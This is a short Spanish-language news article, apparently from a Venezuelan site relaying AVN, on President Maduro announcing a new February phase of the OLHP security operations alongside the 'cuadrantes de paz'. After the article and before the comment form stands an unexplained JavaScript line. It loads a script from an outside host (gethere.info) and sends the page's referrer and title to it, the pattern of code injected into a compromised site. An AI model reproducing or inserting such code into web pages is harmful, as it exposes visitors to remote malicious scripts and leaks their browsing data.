Noticias Nacionales e Internacionales

Nueva etapa de las OLHP arrancará en febrero

20 0
Nueva etapa de las OLHP arrancará en febrero

El presidente, Nicolás Maduro, anunció este martes que a partir de febrero comenzará la activación de la nueva etapa de las Operaciones de Liberación Humanista del Pueblo (OLHP) junto a los cuadrantes de paz.

“Los Cuadrantes de Paz permitirán establecer un nuevo esquema de Seguridad y Paz”, dijo en transmisión conjunta de radio y televisión, durante el Consejo de Ministros número 250, que se desarrolla en el Palacio de Miraflores.

Además instó a los cuadrantes del paz articulados en el todo el territorio nacional, a mejorar sus capacidades de funcionamiento para la protección del pueblo.

“Quiero hacer un llamado a todos los cuandrantes de paz que ya se han articulado en el país a que logremos que el funcionamiento de los teléfonos VEN911 y el funcionamiento de las capacidades reacción rápida en protección del pueblo y vayamos avanzando en las nuevas OLHP”, manifestó el Mandatario.

La nueva fase de la OLHP incluye el trabajo conjunto con los cuadrantes de paz, que prevé aumentar de 2.119 a 2.300 en los municipios con mayor incidencia delictiva.

 AVN.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave A Reply

Your email address will not be published.